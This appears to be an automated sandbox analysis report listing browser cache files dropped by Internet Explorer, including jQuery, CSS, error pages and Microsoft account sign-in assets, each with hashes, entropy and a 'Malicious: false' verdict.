Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ebd910,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x41ebd910,0x01d53640</date><accdate>0x41ee4e75,0x01d53640</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..


C:\Users\user\AppData\Local\Microsoft\Internet Explorer\imagestore\6aw4uvh\imagestore.dat

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: data

Size (bytes): 72284

Entropy (8bit): 3.0775400929565304

Encrypted: false

MD5: 0955EFE2855D2095B6429167AFFB0A5C

SHA1: 7BE788245F2FAFD22DB1165B3D9BAFDF0D51509E

SHA-256: 2137D1B12AE9618FEF47E861B2D0B3D7D464BB6C1B1DCE8AF7E84C184F2F40A5

SHA-512: E3083BF3B70950CD43AC86D9098F8F0302AC7DF2F6A29BFAD183CEF3B0F6DB1FE3EB05E5F32380037C9C859A2A71EA858590A204CA1A308683D07F40D865DB71

Malicious: false

Reputation: low

Preview: W.h.t.t.p.s.:././.a.a.d.c.d.n...m.s.a.u.t.h...n.e.t./.e.s.t.s./.2...1./.c.o.n.t.e.n.t./.i.m.a.g.e.s./.f.a.v.i.c.o.n._.a._.e.u.p.a.y.f.g.g.h.q.i.a.i.7.k.9.s.o.l.6.l.g.2...i.c.o.~(................h(......(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...33333333333333333333

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\NewErrorPageTemplate[1]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1612

Entropy (8bit): 4.869554560514657

Encrypted: false

MD5: DFEABDE84792228093A5A270352395B6

SHA1: E41258C9576721025926326F76063C2305586F76

SHA-256: 77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075

SHA-512: E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD

Malicious: false

Reputation: high, very likely benign file

Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\app[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators

Size (bytes): 344831

Entropy (8bit): 5.052152993582276

Encrypted: false

MD5: 677E66D9B62C449D01191132B1125AE3

SHA1: A6A31BC3B401638C95C5B587D5AC8D44627C0611

SHA-256: AC1E130CBDEC824CFB8EE8FFC2CC3218365FBA0B0C23D5DAC7A8B038C1176F46

SHA-512: 77B708FA7F8E3E262B43D6978079C4E930FFD9693B05314491155856CA9A65C0622108AA468ED86B8E18AE1CD67A1CB0755B62DEE39E8D1DD53D3D6C3856DF6B

Malicious: false

Reputation: low

Preview: @font-face {. font-family: "wf_segoe-ui_normal";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");. font-weight: normal;. font-style: normal; }..@font-face {. font-family: "wf_segoe-ui_light";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.ttf") format("truetype

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\arrow_px_up[1].gif

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: GIF image data, version 89a, 7 x 9

Size (bytes): 1305

Entropy (8bit): 3.799575332787369

Encrypted: false

MD5: BA32C65F44781F977BBB0B9F57413F48

SHA1: 3618723B0494B92619CE342EE7174EBAEFCD90D9

SHA-256: 3C3E5B3BFFB0A6122D4AD5818C7B609856B9CDC1527C7E19F8E4B042D30723E6

SHA-512: 13A1EC1F9F1651754E7494600C070D3560177B22A278652FEA9EBAC7EC71DD43A016D66CE83902A2B600DBF48F4CDD98D901F46B06084E1F20CD95AB8CED2B9D

Malicious: false


Reputation: low

Preview: GIF89a...........3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................!.......,............... .`.....\8....!>L(.b@.;.PNG........IHDR................a....sRGB.........gAMA......a.....IDAT8O.S;[email protected]....^I..<."&..W..Y...Y...........m...E.<..$..n...j..kL&......}.j....


C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[1]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1678

Entropy (8bit): 4.566317707595381

Encrypted: false

MD5: 7E81A79F38695E467A49EE41DD24146D

SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316

SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536

SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622

Malicious: false

Reputation: moderate, very likely benign file

Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\dnserrordiagoff[2]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 1678

Entropy (8bit): 4.566317707595381

Encrypted: false

MD5: 7E81A79F38695E467A49EE41DD24146D

SHA1: 035E110C36BF3072525B05394F73D1BA54D0D316

SHA-256: A705D1E0916A79B0D6E60C41A9CE301ED95B3FC00E927F940AB27061C208A536

SHA-512: 53C5F2F2B9AD8B555F9AE6644941CF2016108E803EA6AB2C7418E31E66874DEA5A2BC04BE0FA9766E7206617879520E730E9E3E0DE136BAE886C2E786082D622

Malicious: false

Reputation: moderate, very likely benign file

Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css">.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>.. <l

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\ellipsis_white[1].svg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 22356

Entropy (8bit): 6.694074336333653

Encrypted: false

MD5: 5CFA4099FDF578C66B0BDD5ED7863EA2

SHA1: F7655793E88D1A769F5CCF472870AB5CD503C597

SHA-256: 17A4AE07EF1009A19AA43AAAB3CBD803CB1E043D92E6700833F0E9DA7DB65403

SHA-512: 6AA8068CC945481D4392D531AD7E5E45F9B8A00ED9064C3D376A4984F33445DE48D283F1A699C870FE97A484EA02C2A65DB9214202C9E7F4816BBA7D4A6131D0

Malicious: false

Reputation: low

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 16 16"><title>assets</title><path fill="#ffffff" d="M1.143,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.107,1.107,0,0,1-.446.089A1.107,1.107,0,0,1,.7,9.054a1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893A1.164,1.164,0,0,1,.7,6.946a1.107,1.107,0,0,1,.446-.089M8,6.857a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,8,6.857m6.857,0a1.107,1.107,0,0,1,.446.089,1.164,1.164,0,0,1,.607.607,1.161,1.161,0,0,1,0,.893,1.164,1.164,0,0,1-.607.607,1.161,1.161,0,0,1-.893,0,1.164,1.164,0,0,1-.607-.607,1.161,1.161,0,0,1,0-.893,1.164,1.164,0,0,1,.607-.607A1.107,1.107,0,0,1,14.857,6.857Z"/></svg>623,1.381,5.212,5.212,0,0,1,1.3,3.729,5.257,5.257,0,0,1-1.386,3.83,5.019,5.019,0,0,1-

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquery-3.3.1.min[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 86927

Entropy (8bit): 5.289226719276158

Encrypted: false


MD5: A09E13EE94D51C524B7E2A728C7D4039

SHA1: 0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE

SHA-256: 160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF

SHA-512: F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A

Malicious: false

Reputation: moderate, very likely benign file

Preview: /*! jQuery v3.3.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t||r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[c.call(e)]||"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},


C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\jquerypackage_1.10_5V7LAuc3bNAQx2QQfr1RPw2[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 96649

Entropy (8bit): 5.297804550899051

Encrypted: false

MD5: E55ECB02E7376CD010C764107EBD513F

SHA1: FA6D184DF01EC535628DC8FAF38211591BAADFC8

SHA-256: 5776881753B95A0ABE5D1F6EFE3ABE7B83A3265EACCD117DD948E523C044600C

SHA-512: 099C665E1CEE8DF9C5D5C340A14170341BD29E0321875FF08E594B750CFDBF2CA8C9B45B584FCA21F87CBE6CD8A170918CECFF8C9796AAFA3D89F0AA97509ABD

Malicious: false

Reputation: moderate, very likely benign file

Preview: /*!. * jQuery JavaScript Library v1.10.2. * http://jquery.com/. *. * Includes Sizzle.js. * http://sizzlejs.com/. *. * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors. * Released under the MIT license. * http://jquery.org/license. *. * Date: 2013-07-03T13:48Z. */.!function(e,t){function n(e){var t=e.length,n=ct.type(e);return ct.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}function r(e){var t=kt[e]={};return ct.each(e.match(pt)||[],function(e,n){t[n]=!0}),t}function i(e,n,r,i){if(ct.acceptData(e)){var o,a,s=ct.expando,u=e.nodeType,l=u?ct.cache:e,c=u?e[s]:e[s]&&s;if(c&&l[c]&&(i||l[c].data)||r!==t||"string"!=typeof n){return c||(c=u?e[s]=tt.pop()||ct.guid++:s),l[c]||(l[c]=u?{}:{"toJSON":ct.noop}),("object"==typeof n||"function"==typeof n)&&(i?l[c]=ct.extend(l[c],n):l[c].data=ct.extend(l[c].data,n)),a=l[c],i||(a.data||(a.data={}),a=a.data),r!==t&&(a[ct.camelCase(n)]=r),"string"==typeof n?(o=a[n],null==o&&(o=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\knockout_3.3.0_RcZl9zWsSPzSceyfD4X8cA2[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators

Size (bytes): 284727

Entropy (8bit): 5.445836715201731

Encrypted: false

MD5: DCD7AA5F0622498CCC7149AE551D05C4

SHA1: 793500F4E007A374806281DEEE883BBB025964B6

SHA-256: 00F339738C54CF7FB233C1EC171306FD95F90030B51AB92A2F91030EF7BDF24B

SHA-512: 6B9431E03962B2DEEC78B63BB8A8842A181752F2828F38F5B3807AD40A3BE224E65C9EBF80B1F3C953509C325B861C4F4377B4B9289A4570A30EA4B61AF157C6

Malicious: false

Reputation: low

Preview: /*!------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------....This file is based on or incorporates material from the projects listedbelow (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise. .... * Knockout JavaScript library v3.3.0.. * (c) Steven Sanderson - http://knockoutjs.com/.. * License: MIT (http://www.opensource.org/licenses/mit-license.php)....Provided for Informational Purposes Only....MIT License ....Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the Software)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\microsoft_logo[1].svg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 1269

Entropy (8bit): 4.111137762573903

Encrypted: false

MD5: 96CB8CEA30D947C962FA2CF959F23890

SHA1: FE2C6762A50C9E4B695AD2DA64663E73F98FE890

SHA-256: 5306E406F5B7B320D6CC69ECF511A3B606058844BC163249781986CBD03E3721

SHA-512: 1191A962C945FBFA4CE9A99B51BB1651BE54DDF221896B37B7001323C35E9672035291332AED39918009B93B57F7D1BEDE4C3205DE14B01C4538E7F20C57C1A3

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.268,0,0,1,.419-.967,1.413,1.413,0,0,1,1-.39,1.392,1.392,0,0,1,1.02.4,1.3,1.3,0,0,1,.4.958,1.248,1.248,0,0,1-.414.953,1.428,1.428,0,0,1-1.01.385A1.4,1.4,0,0,1,47.25,6.6a1.261,1.261,0,0,1-.409-.948M49.41,18.4H47.081V8.507H49.41Zm7.064-1.694a3.213,3.213,0,0,0,1.145-.241,4.811,4.811,0,0,0,1.155-.635V18a4.665,4.665,0,0,1-1.266.481,6.886,6.886,0,0,1-1.554.164,4.707,4.707,0,0,1-4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,0,.813,2.338,2.936,2.936,0,0,0,2.209.837M65.4,8.343a2.952,2.952,0,0,1,.5.039,2.1,2.1,0,0,1,.375.1v2.358a2.04,2.04,0,0,0-.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\script[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines, with no line terminators

Size (bytes): 171715

Entropy (8bit): 5.325926407045175

Encrypted: false

MD5: C3990846C6D6520733D90A210187FEE5

SHA1: 98E8BBE9C67C53BBE501557FDA3E7D44100F2794

SHA-256: ADEED61C97600E999A2773C89A4D906711C6EC77BD5C8493A2F3C10FB357983D

SHA-512: 6F9BF6D86428A781D09B063F89679C5E9ED5AA4E17E249F2F44D1793B6382B1659EADC1CB57321FFF4F49C6FAC38BC03FAF11479115D64F390EED0A7589CC084

Malicious: false

Preview: function ShowSelectedComponentKeyPress(n,t){if(window.event.keyCode==13)return ShowSelectedComponent(n,t),!1}function ShowHighLight(n){var t=$("#div"+n).height();$.browser.msie&&parseInt($.browser.version,10)==7?$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":Math.round(t/2+.3)+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":Math.round(t/2+.3)+"px solid white"}):$("#div"+n+" > .highlight").css({width:"0",height:"0","background-color":"white",float:"left","border-top":t/2+.3+"px solid white","border-right":"0.75em solid "+$("#div"+n).css("background-color"),"border-bottom":t/2+.3+"px solid white"})}function SetRightSideNavigationMenuHeight(){$("[id^=dvModuleGroup_]").hide();window.location.search.toLowerCase().indexOf("bookmarkid")!=-1&&SelectBookMark();window.location.search.toLowerCase().indexOf("componentid")!=-1&&LoadSelectedInternalLink();$(".div_side_comp").length>0&&$(".

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\signup[1].htm

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: HTML document, ASCII text, with very long lines, with CRLF, LF line terminators

Size (bytes): 110160

Entropy (8bit): 5.15728771558402

Encrypted: false

MD5: E83E402C620D96BDC6DC1A8F13A1F798

SHA1: 899E07DA59CD71FBB33C1B6203494F574320F115

SHA-256: 0AFA5CA70FE738B17AEC5D279BE7F491AA248EDEA77D88A5431E3348FD735D98

SHA-512: 17D7D7A9158F94F45D16DC7D24F4CA2DECB894FB752E539FBAF98EDA2872005D85249E25DE06802C3BEAF4E348D3F9F4BF03FDBF4A89FF4AF6B6793CBB8ECEB2

Malicious: false

Preview: .. Copyright (C) Microsoft Corporation. All rights reserved. -->....<!DOCTYPE html>..<html lang="en" xml:lang="en" class="m_ul" dir="ltr" style="">.. <head>.. <link rel="preconnect" href="https://uhf.microsoft.com" >..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<link rel="preconnect" href="https://acctcdn.msauth.net" crossorigin>..<meta http-equiv="x-dns-prefetch-control" content="on">..<link rel="dns-prefetch" href="//uhf.microsoft.com">..<link rel="dns-prefetch" href="//wut.smartscreen.microsoft.com">..<link rel="dns-prefetch" href="//acctcdn.msauth.net">..<link rel="dns-prefetch" href="//acctcdnmsftuswe2.azureedge.net">..<link rel="dns-prefetch" href="//acctcdnvzeuno.azureedge.net">.... <title>Microsoft account</title>.. <meta http-equiv="Content-Type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, minimum-scale=1.0, user-scalable=yes"/><meta name="format-detection"

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\51-6d3a1e[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode text, with very long lines

Size (bytes): 149391

Entropy (8bit): 5.055058698445385

Encrypted: false

MD5: F375A2C25F0E94DB19E607E07F2C4B47

SHA1: 38949C3F25DDD1E56DE5501FF84F4A6D07F2A6BF

SHA-256: 28C68FD8C3D21374261E3A1CD672AA551F01C0B04C2F49C1B53DF95F6D1CDD7B

SHA-512: DF7A83E40093BAD3E594CFA991FFBC7DDB36AAD64FA4F46F4C36EBD4ACDF2BB965432D73A67138B0EEDC18B6FD396369EF0B4DD66CAFBA181CD149725A4A8DF3

Malicious: false

Preview: @charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\converged.v2.login.min_bxeixgi3llnj-nuc4-xqwa2[1].css

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 100774

Entropy (8bit): 5.305482238693464

Encrypted: false

MD5: 6F11225E02372CB349FA7B9CE3E5EAC0

SHA1: A6773684CB3501A34BDC560A3173262E879FF3A8

SHA-256: 21CC48423EE47207382CC9C1C3885913079BE17805E6FF81E76E0E7165CA32CD

SHA-512: 1AD8016439C16B967BAB4BB3A580B0A0A6696253C29B49A45C096BDD93F6E860F97084D188181A68C5D5B09482042966681AD8CD0E6E81564FD594B507570C7D

Malicious: false

Preview: /*! Copyright (C) Microsoft Corporation. All rights reserved. *//*!.------------------------------------------- START OF THIRD PARTY NOTICE -----------------------------------------..This file isbased on or incorporates material from the projects listed below (Third Party IP). The original copyright notice and the license under which Microsoft received such Third Party IP, are set forth below. Such licenses and notices are provided for informational purposes only. Microsoft licenses the Third Party IP to you under the licensing terms for the Microsoft product. Microsoft reserves all other rights not expressly granted under this agreement, whether by implication, estoppel or otherwise...//-----------------------------------------------------------------------------.twbs-bootstrap-sass (3.3.0).//-----------------------------------------------------------------------------..The MIT License (MIT)..Copyright (c) 2013 TwiInc..Permission is hereby granted, free of charge, to any person

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\convergedbg_small_v2_Z9GCPpM7FVE8hxRSZUez6g2[1].jpg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: JPEG image data, baseline, precision 8, 50x28, frames 3

Size (bytes): 286254

Entropy (8bit): 7.961526577350427

Encrypted: false

MD5: ABA046173F6291AF45F08FD4FBC6386D

SHA1: 453FF1D21D7998626B0E9A107ED9623BAAC998D9

SHA-256: D775B46CE0CEA4773C163A56DC52DAA5DDBCE0BAC7D24B57B8DAC50A66419989

SHA-512: 1F2757149A691BD5338541599FC2980934433B588598FCF8254C9E9D6B15BD59902CF4A2190CF46906404E5ACF54C500A89DA9AF12D4C841827446DBADD31351

Malicious: false

Preview: .....Phttp://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about=""/> </rdf:RDF> </x:xmpmeta>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\dropdown_caret_KXSZjGsyILZaoTf0sI9X-A2[1].svg

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: SVG Scalable Vector Graphics image

Size (bytes): 224

Entropy (8bit): 5.066130335315081

Encrypted: false

MD5: 2974998C6B3220B65AA137F4B08F57F8

SHA1: F4F08DA689179DE68EE40CD12ECDCC5AC54B3979

SHA-256: 96D52BD03E244A44931A541A807067792D638DD29EC14A87A78F2BE85D12D19A

SHA-512: 6B4F2439CA99109A7C97828E5972A8E7C7FCA3745B2FB4738EBD9329A99234A8CD3BC4C0C48B5BAA917D4BAA64CDAEB5D74456DEFDDDA3E07FAA803283BE0287

Malicious: false

Preview: <svg xmlns="http://www.w3.org/2000/svg" width="36" height="36" viewBox="0 0 36 36"><title>assets</title><path d="M18,22.484l-8-8,.969-.968L18,20.547l7.031-7.031.969.968-8,8Z"/><rect width="36" height="36" fill="none"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\errorPageStrings[1]

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators

Size (bytes): 4720

Entropy (8bit): 5.164796203267696

Encrypted: false

MD5: D65EC06F21C379C87040B83CC1ABAC6B

SHA1: 208D0A0BB775661758394BE7E4AFB18357E46C8B

SHA-256: A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F

SHA-512: 8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E

Malicious: false

Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\V5D02472\jquery-1.11.2.min[1].js

Process: C:\Program Files (x86)\Internet Explorer\iexplore.exe

File Type: ASCII text, with very long lines

Size (bytes): 95931

Entropy (8bit): 5.394232486761965

Encrypted: false

MD5: 5790EAD7AD3BA27397AEDFA3D263B867

SHA1: 8130544C215FE5D1EC081D83461BF4A711E74882

SHA-256: 2ECD295D295BEC062CEDEBE177E54B9D6B19FC0A841DC5C178C654C9CCFF09C0

SHA-512: 781ACEDC99DE4CE8D53D9B43A158C645EAB1B23DFDFD6B57B3C442B11ACC4A344E0D5B0067D4B78BB173ABBDED75FB91C410F2B5A58F71D438AA6266D048D98A

Malicious: false

